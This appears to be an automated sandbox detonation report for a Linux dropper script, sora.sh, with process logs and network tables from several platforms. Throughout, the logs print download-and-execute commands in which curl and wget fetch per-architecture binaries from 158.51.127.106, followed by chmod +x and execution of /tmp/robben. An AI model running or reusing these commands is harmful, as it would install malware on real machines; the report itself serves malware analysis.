[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:20
Platform
debian12-mipsel-20240221-en
Max time kernel
48s
Max time network
53s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-logrotate.service-vLtvov systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:31
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
152s
Max time network
571s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| US | 8.8.8.8:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| GB | 185.125.190.26:443 | canonical-lgw01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 1.1.1.1:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| US | 1.1.1.1:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| GB | 185.125.190.27:443 | canonical-lgw01.cdn.snapcraftcontent.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | _http._tcp.security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| GB | 185.125.190.83:80 | security.ubuntu.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| SE | 194.71.11.163:80 | se.archive.ubuntu.com | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:22
Platform
debian9-armhf-20240611-en
Max time kernel
98s
Max time network
126s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
